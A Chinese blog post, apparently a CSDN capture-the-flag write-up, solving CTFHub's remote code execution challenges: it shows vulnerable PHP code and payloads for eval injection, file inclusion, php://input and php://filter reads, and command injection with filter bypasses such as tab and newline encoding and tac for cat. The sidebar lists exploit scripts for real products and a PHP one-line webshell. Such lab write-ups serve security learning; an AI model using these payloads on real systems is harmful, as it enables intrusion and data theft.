【CTFHub】RCE

最新推荐文章于 2024-05-30 23:56:53 发布
最新推荐文章于 2024-05-30 23:56:53 发布
阅读量594 收藏 1
点赞数 2
分类专栏: 刷题记录 文章标签: linq 蓝桥杯 webview
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61109509/article/details/123040002
版权

目录

eval执行

文件包含 

         strpos漏洞

php://input

读取源代码

​ 远程包含

 命令注入

命令注入-过滤cat 

命令注入-过滤空格 

【攻防世界】web新手区 command_execution

 过滤目录分隔符

过滤运算符

 综合过滤练习

eval执行

<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

先查看下目录

/?cmd=system('ls');

 

看来这一级啥都没有,那我们看看上一级文件夹

/?cmd=system('ls /');

 打开flag,注意打开的是下一级

/?cmd=system('cat /flag_30311');

文件包含 

<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if (!strpos($_GET["file"], "flag")) {
        include $_GET["file"];
    } else {
        echo "Hacker!!!";
    }
} else {
    highlight_file(__FILE__);
}
?>

点开shell

strpos漏洞

  • strpos — 查找字符串首次出现的位置 
  • strpos 函数返回查找到的子字符串的下标。如果字符串开头就是我们要搜索的目标,则返回下标 0 ;如果搜索不到,则返回 false 

request = post + get

查看根目录

 

index.php shell.txt 

那我们查看上一级目录 

 bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

查看那一级的flag 

php://input

php:// — 访问各个输入/输出流
php://input 是个可以访问请求的原始数据的只读流.
可以接收post请求作为输入流的输入,将请求作为PHP代码的输入传递给目标变量,以达到以post 的形式进行输入的目的。 

  

先进行抓包

 本级目录没有,查看上一级目录

查看就行了

读取源代码

 

看题目,发现不能用input了

/?file=php://filter/read=convert.base64-encode/resource=/flag

远程包含

还是一样

 

 命令注入

先输入127.0.0.1试试,有回显

查看下目录

 

打开这个文件,却发现打不开

 

新学一种方法

应该是文件中包含特殊字符,使用管道运行base64加密内容 

127.0.0.1 & cat *.php | base64

 

解码出flag

命令注入-过滤cat 

127.0.0.1 & tac *.php | base64

命令注入-过滤空格 

空格用/**/代替

  

 也可以127.0.0.1|ls

空格用<代替 

127.0.0.1|cat<flag_32332039011989.php|base64

解码得到flag

掌握有关命令执行的知识 windows 或 linux 下:

command1 && command2 先执行 command1,如果为真,再执行 command2

command1 | command2 只执行 command2

command1 & command2 先执行 command2 后执行 command1

command1 || command2 先执行 command1,如果为假,再执行 command2 

【攻防世界】web新手区 command_execution

先输入一个127.0.0.1看回显

127.0.0.1 && ls 看目录

 直接捕获flag试试

查看这个文件,出flag

注意:cat和目录之间有空格 

 过滤目录分隔符

127.0.0.1|ls

 

127.0.0.1;cd flag_is_here;ls

 

127.0.0.1;cd flag_is_here;tac flag_210667739624.php|base64

 解码即可

过滤运算符

我用;

过滤了管道符|,不能再使用了
base64 1.php 与****|base64是等价的

12.0.0.1 ; base64 flag_27475302269053.php

 解码即可

 综合过滤练习

<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

前面的全都过滤

空格用%09代替
flag用f***
cat用tac
linux下 命令分隔符除了;还有%0a

因为%0a是url编码,所以一定要输在url中,否则%0a会被再次编码 

?ip=127.0.0.1%0acd%09f***_is_here%0als#

 

?ip=127.0.0.1%0acd%09f***_is_here%0abase64%09*.php#

 解码即可

pipasound
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpstudy_rce.py
10-11
phpstudy_rce
微信远程rce poc
04-18
微信远程rce poc
CTFHub:Rce
2301_80911344的博客
04-06 996
RCE,即远程代码执行(Remote Code Execution),是指攻击者通过网络向目标计算机发送恶意指令或代码,成功地在目标计算机上远程执行这些指令或代码的能力。RCE是一种严重的安全漏洞,因为它允许攻击者在没有物理接触或认证的情况下控制另一台计算机。获取系统的控制权限。改变或破坏数据。启动或终止进程。在受影响的系统上安装恶意软件。监视用户行为或窃取敏感信息。因为RCE能够提供如此高级的控制权限,所以这类漏洞通常被认为是非常严重的,并且在被发现后应该立即修补。
fanwei_rce.py
10-11
泛微OA管理系统RCE漏洞利用脚本 使用方法 python3 rce.py http://URL
无参数 rce.md
04-01
记录一下,关于这次比赛的 wp >.< 并向大佬们积极学习 >.< 顺便混点分
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
ctfhub RCE
2202_75317918的博客
01-27 749
ctfhub rce
CTFHUB RCE——文件包含
winofkill的博客
12-11 6041
1.文件包含 首先我们开启题目 看到的是一大串代码 我们仔细看一下php代码,重点是 if(!strpos($_GET["file"],"flag")){ include$_GET["file"]; 这里有一个strpos(string,find,start)函数 意思在string字符串中找find的位置,start是查找的开始位置 那么这句代码的意思就是如果file中没有flag字符串就执行下面的include$_GET["file"] 否则...
ctfhub rce
zbbjya的博客
01-27 1581
eval执行 使用蚁剑打开然后 就可以得到flag了 文件包含 打开界面 php://input 伪协议相当于一个削弱post的方法 input 使用bp该包将改头 然后发送到repeater 在界面中加入<?php system("ls /");?> 从raw中我们会看到 flag_11583 要从中得到flag使用 读取源代码 从图片中我们可以看出问题所在 使用bp抓包然后发送到repeater php://filter 任意文件读取 ?file=php://filter
CTFHUB RCE作业
I_WORM的博客
04-17 650
注意:%09是在url框中修改的,而不是直接在输入框中输入,因为这是url编码,如果在ip输入框中输入会进行二次url编码,%09为tab键的url编码,无法直接输入。构造payload:ip=127.0.0.1%0acd%09fl\ag_is_here%0atac%09fla\g_210412363721473.php#首先到flag_is_here文件目录下,然后读取flag_8317178653643.php文件内容。构造payload:127.0.0.1|ls flag_is_here。
CTFHub RCE(命令执行、文件包含) WriteUP
tangshuangsss的专栏
07-19 972
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介CTFHub 为网络安全工程师提供网络安全攻防技能培训、实战、技能提升等服务。「赛事中心」提供全网...
【渗透测试】文件上传漏洞
ssrf
08-01 970
一、任意文件上传 靶场DVWA 安全级别:低 上传php文件 <?php @eval($_POST['caidao']);?> // 一句话木马 查看后端源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $targe
常见漏洞及其原理(面试)
01-13 913
常见漏洞及其原理(面试) ARP欺骗 每台主机都有一个ARP缓存表,缓存表中记录了IP地址与MAC地址的对应关系,而局域网数据传输依靠的是MAC地址。 在ARP缓存表机制存在一个缺陷 就是当请求主机收到ARP应答包后,不会去验证自己是否向对方主机发送过ARP请求包,就直接把这个返回包中的IP地址与MAC地址的对应关系保存进ARP 缓存表中,如果原有相同IP对应关系,原有的则会被替换。这样攻击者就有了偷听主机传输的数据的可能。 ARP欺骗防护 1)在主机绑定网关MAC与IP地址为静态(默认为动态)
CTFhub技能树_Web RCE
weixin_45897324的博客
10-11 1182
一、eval执行 1.分析: 打开网站显示如下代码: <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 大体意思是:判断cmd是否被设置,若cmd被赋值,则执行如下语句,否则就继续显示以上代码。 eval($_REQUEST["cmd"]); 其中: eval():该函数可以把字符串作为PHP代码执行 $_REQUEST['
eval执行
qq_52671379的博客
06-14 1656
eval执行 题目 eval(xxx)函数将xxx当做PHP语言执行 <?php EVaL ($_REQUEST [“cmd”] ) ?> _REQUEST包含了GET、_GET、G​ET、_POST、$_COOKIE的所有内容,是它们的集合体。也就内是说只要用其中一种方容式做一个表单,把cmd这个变量给POST或者GET,甚至用cookies就可以把传输上去的内容执行。简而言之吧,就是执行cmd的值。以上代码就是执行cmd 先通过system构造网址,查找当前目录文件 ?cmd=syste
SpringBoot整合Kafka的快速使用教程
weixin_50348837的博客
05-27 1193
Kafka是一个高性能、分布式的消息发布-订阅系统,被广泛应用于大数据处理、实时日志分析等场景。Spring Boot作为目前最流行的Java开发框架之一,其简洁的配置和丰富的工具使得与Kafka的集成变得更加容易。本文将介绍如何使用Spring Boot整合Kafka,实现高效的数据处理和消息传递。
kafka-主题创建(主题操作的命令)
小丁的博客
05-28 590
一个分区可以有多个副本(replicas:负责接收数据的分区副本为leader,其他的为follower)副本数量不能超过broker数量。一个topic可能拆分成多个分区(partition)kafka发送消息会存到主题中。消费者会从主题中获取消息消费。
蓝桥杯 超级胶水 答疑
weixin_72770922的博客
05-29 367
【代码】蓝桥杯 超级胶水 答疑。
蓝桥杯dp 负载均衡 传球游戏 摆花 画中漂流
最新发布
weixin_72770922的博客
05-30 210
【代码】蓝桥杯dp 负载均衡 传球游戏 摆花 画中漂流。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值